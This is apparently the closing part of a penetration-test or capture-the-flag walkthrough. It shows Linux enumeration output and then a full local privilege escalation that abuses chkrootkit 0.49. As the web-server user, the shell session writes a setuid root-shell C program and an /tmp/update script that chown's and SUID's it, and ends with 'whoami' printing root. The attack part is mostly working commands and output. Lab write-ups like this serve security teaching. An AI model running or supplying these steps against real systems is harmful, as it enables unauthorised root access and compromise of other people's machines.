lrwxrwxrwx 1 root root 37 Mar 30 2016 /usr/lib/vmware-vgauth/VGAuthService -> /usr/lib/vmware-tools/bin32/appLoader
-rwxr-xr-x 1 root root 187332 Dec 20 2011 /usr/sbin/lighttpd
-rwxr-xr-x 1 root root 531776 Jan 13 2016 /usr/sbin/sshd
lrwxrwxrwx 1 root root 37 Mar 30 2016 /usr/sbin/vmtoolsd -> /usr/lib/vmware-tools/sbin32/vmtoolsd
lrwxrwxrwx 1 root root 37 Mar 30 2016 /usr/sbin/vmware-vmblock-fuse -> /usr/lib/vmware-tools/bin32/appLoader
/etc/init.d/ binary permissions:
total 144
drwxr-xr-x 2 root root 4096 Apr 12 2016 .
drwxr-xr-x 84 root root 4096 Jan 5 09:41 ..
-rw-r--r-- 1 root root 0 Mar 30 2016 .legacy-bootordering
-rw-r--r-- 1 root root 2427 Jul 26 2012 README
-rwxr-xr-x 1 root root 4596 Sep 25 2012 apparmor
lrwxrwxrwx 1 root root 21 Oct 25 2011 atd -> /lib/init/upstart-job
-rwxr-xr-x 1 root root 2444 Jul 26 2012 bootlogd
lrwxrwxrwx 1 root root 21 Apr 19 2012 console-setup -> /lib/init/upstart-job
lrwxrwxrwx 1 root root 21 Jun 19 2012 cron -> /lib/init/upstart-job
lrwxrwxrwx 1 root root 21 Jun 13 2013 dbus -> /lib/init/upstart-job
lrwxrwxrwx 1 root root 21 Nov 26 2013 dmesg -> /lib/init/upstart-job
-rwxr-xr-x 1 root root 1242 Dec 13 2011 dns-clean
lrwxrwxrwx 1 root root 21 Mar 14 2012 friendly-recovery -> /lib/init/upstart-job
-rwxr-xr-x 1 root root 1105 Dec 15 2015 grub-common
-rwxr-xr-x 1 root root 1329 Jul 26 2012 halt
lrwxrwxrwx 1 root root 21 May 26 2011 hostname -> /lib/init/upstart-job
lrwxrwxrwx 1 root root 21 Mar 29 2012 hwclock -> /lib/init/upstart-job
lrwxrwxrwx 1 root root 21 Mar 29 2012 hwclock-save -> /lib/init/upstart-job
lrwxrwxrwx 1 root root 21 Feb 3 2012 irqbalance -> /lib/init/upstart-job
-rwxr-xr-x 1 root root 1293 Jul 26 2012 killprocs
-rwxr-xr-x 1 root root 2545 Aug 19 2010 lighttpd
lrwxrwxrwx 1 root root 21 Nov 20 2011 module-init-tools -> /lib/init/upstart-job
lrwxrwxrwx 1 root root 21 Sep 19 2013 network-interface -> /lib/init/upstart-job
lrwxrwxrwx 1 root root 21 Sep 19 2013 network-interface-container -> /lib/init/upstart-job
lrwxrwxrwx 1 root root 21 Sep 19 2013 network-interface-security -> /lib/init/upstart-job
-rwxr-xr-x 1 root root 2797 Feb 13 2012 networking
-rwxr-xr-x 1 root root 882 Jul 26 2012 ondemand
lrwxrwxrwx 1 root root 21 Sep 12 2012 passwd -> /lib/init/upstart-job
lrwxrwxrwx 1 root root 21 May 16 2013 plymouth -> /lib/init/upstart-job
lrwxrwxrwx 1 root root 21 May 16 2013 plymouth-log -> /lib/init/upstart-job
lrwxrwxrwx 1 root root 21 May 16 2013 plymouth-ready -> /lib/init/upstart-job
lrwxrwxrwx 1 root root 21 May 16 2013 plymouth-splash -> /lib/init/upstart-job
lrwxrwxrwx 1 root root 21 May 16 2013 plymouth-stop -> /lib/init/upstart-job
lrwxrwxrwx 1 root root 21 May 16 2013 plymouth-upstart-bridge -> /lib/init/upstart-job
-rwxr-xr-x 1 root root 561 Feb 4 2011 pppd-dns
lrwxrwxrwx 1 root root 21 Oct 28 2013 procps -> /lib/init/upstart-job
-rwxr-xr-x 1 root root 8635 Jul 26 2012 rc
-rwxr-xr-x 1 root root 801 Jul 26 2012 rc.local
-rwxr-xr-x 1 root root 117 Jul 26 2012 rcS
-rwxr-xr-x 1 root root 639 Jul 26 2012 reboot
lrwxrwxrwx 1 root root 21 Sep 8 2012 resolvconf -> /lib/init/upstart-job
-rwxr-xr-x 1 root root 4395 Nov 8 2011 rsync
lrwxrwxrwx 1 root root 21 Nov 26 2013 rsyslog -> /lib/init/upstart-job
-rwxr-xr-x 1 root root 4321 Jul 26 2012 sendsigs
lrwxrwxrwx 1 root root 21 Apr 19 2012 setvtrgb -> /lib/init/upstart-job
-rwxr-xr-x 1 root root 590 Jul 26 2012 single
-rw-r--r-- 1 root root 4304 Jul 26 2012 skeleton
-rwxr-xr-x 1 root root 4371 Jan 13 2016 ssh
-rwxr-xr-x 1 root root 567 Jul 26 2012 stop-bootlogd
-rwxr-xr-x 1 root root 1143 Jul 26 2012 stop-bootlogd-single
-rwxr-xr-x 1 root root 700 May 23 2012 sudo
lrwxrwxrwx 1 root root 21 Jul 19 2013 udev -> /lib/init/upstart-job
lrwxrwxrwx 1 root root 21 Jul 19 2013 udev-fallback-graphics -> /lib/init/upstart-job
lrwxrwxrwx 1 root root 21 Jul 19 2013 udev-finish -> /lib/init/upstart-job
lrwxrwxrwx 1 root root 21 Jul 19 2013 udevmonitor -> /lib/init/upstart-job
lrwxrwxrwx 1 root root 21 Jul 19 2013 udevtrigger -> /lib/init/upstart-job
lrwxrwxrwx 1 root root 21 Apr 5 2012 ufw -> /lib/init/upstart-job
-rwxr-xr-x 1 root root 2800 Jul 26 2012 umountfs
-rwxr-xr-x 1 root root 2211 Jul 26 2012 umountnfs.sh
-rwxr-xr-x 1 root root 2926 Jul 26 2012 umountroot
-rwxr-xr-x 1 root root 1985 Jul 26 2012 urandom
### SOFTWARE #############################################
Sudo version:
Sudo version 1.8.3p1
### INTERESTING FILES ####################################
Useful file locations:
/bin/nc
/bin/netcat
/usr/bin/wget
/usr/bin/gcc
Installed compilers:
ii gcc 4:4.6.3-1ubuntu5 GNU C compiler
ii gcc-4.6 4.6.3-1ubuntu5 GNU C compiler
Can we read/write sensitive files:
-rw-r--r-- 1 root root 953 Apr 12 2016 /etc/passwd
-rw-r--r-- 1 root root 620 Mar 30 2016 /etc/group
-rw-r--r-- 1 root root 665 Mar 30 2016 /etc/profile
-rw-r----- 1 root shadow 810 Apr 25 2016 /etc/shadow
Can't search *.conf files as no keyword was entered
Can't search *.log files as no keyword was entered
Can't search *.ini files as no keyword was entered
All *.conf files in /etc (recursive 1 level):
-rw-r--r-- 1 root root 604 Oct 19 2011 /etc/deluser.conf
-rw-r--r-- 1 root root 350 Mar 30 2016 /etc/popularity-contest.conf
-rw-r--r-- 1 root root 552 Feb 8 2012 /etc/pam.conf
-rw-r--r-- 1 root root 144 Mar 30 2016 /etc/kernel-img.conf
-rw-r--r-- 1 root root 1260 May 2 2011 /etc/ucf.conf
-rw-r--r-- 1 root root 3343 Sep 30 2013 /etc/gai.conf
-rw-r--r-- 1 root root 92 Apr 19 2012 /etc/host.conf
-rw-r--r-- 1 root root 321 Mar 29 2012 /etc/blkid.conf
-rw-r--r-- 1 root root 475 Apr 19 2012 /etc/nsswitch.conf
-rw-r--r-- 1 root root 2083 Oct 16 2013 /etc/sysctl.conf
-rw-r--r-- 1 root root 1263 Sep 5 2013 /etc/rsyslog.conf
-rw-r--r-- 1 root root 4728 May 2 2012 /etc/hdparm.conf
-rw-r----- 1 root fuse 216 Oct 18 2011 /etc/fuse.conf
-rw-r--r-- 1 root root 56 Apr 12 2016 /etc/chkrootkit.conf
-rw-r--r-- 1 root root 2981 Mar 30 2016 /etc/adduser.conf
-rw-r--r-- 1 root root 6961 Mar 30 2016 /etc/ca-certificates.conf
-rw-r--r-- 1 root root 956 Mar 30 2012 /etc/mke2fs.conf
-rw-r--r-- 1 root root 333 Mar 30 2016 /etc/updatedb.conf
-rw-r--r-- 1 root root 599 Oct 4 2011 /etc/logrotate.conf
-rw-r--r-- 1 root root 2969 Mar 15 2012 /etc/debconf.conf
-rw-r--r-- 1 root root 15752 Jul 25 2009 /etc/ltrace.conf
-rw-r--r-- 1 root root 34 Mar 30 2016 /etc/ld.so.conf
-rw-r--r-- 1 root root 839 Apr 9 2012 /etc/insserv.conf
Any interesting mail in /var/mail:
total 8
drwxrwsr-x 2 root mail 4096 Mar 30 2016 .
drwxr-xr-x 12 root root 4096 Apr 26 2016 ..
### SCAN COMPLETE ####################################
www-data@ubuntu:/tmp$
dpkg -l | grep chkrootkit
rc chkrootkit 0.49-4ubuntu1.1 rootkit detector
echo 'int main(void)' > test.c
echo '{ ' >> test.c
echo 'setgid(0);' >> test.c
echo 'setuid(0);' >> test.c
echo 'execl("/bin/sh", "sh", 0);' >> test.c
echo '}' >> test.c
echo '#!/bin/bash' > update
echo 'chown root /tmp/test' >> update
echo 'chgrp root /tmp/test' >> update
echo 'chmod u+s /tmp/test' >> update
gcc test.c -o test
gcc test.c -o test
test.c: In function 'main':
test.c:5:1: warning: incompatible implicit declaration of built-in function 'execl' [enabled by default]
test.c:5:1: warning: missing sentinel in function call [-Wformat]
www-data@ubuntu:/tmp$ run-parts
drwxr-xr-x 22 root root 4096 Mar 30 2016 ..
-rwxr-xr-x 1 www-data www-data 40155 Jan 5 09:42 1.sh
-rw-r--r-- 1 www-data www-data 40155 Jan 5 09:43 2.py
-rw-r--r-- 1 www-data www-data 36801 Jan 5 09:43 3.sh
-rw-r--r-- 1 www-data www-data 5123 Jan 5 09:48 37292.c
drwxrwxrwt 2 root root 4096 Jan 5 09:41 VMwareDnD
srwxr-xr-x 1 www-data www-data 0 Jan 5 09:41 php.socket-0
-rwsrwxrwx 1 root root 7235 Jan 5 09:59 test
-rw-rw-rw- 1 www-data www-data 69 Jan 5 09:56 test.c
-rw-rw-rw- 1 www-data www-data 2 Jan 5 09:55 test.cls
-rwxrwxrwx 1 www-data www-data 74 Jan 5 09:57 update
-rw-rw-rw- 1 www-data www-data 20 Jan 5 09:56 updatels
-rw-r--r-- 1 root root 1600 Jan 5 09:41 vgauthsvclog.txt.0
drwx------ 2 root root 4096 Jan 5 09:41 vmware-root
www-data@ubuntu:/tmp$ ./test
./test
whoami
root
Regards,
Yuriy Stanchev/URIX
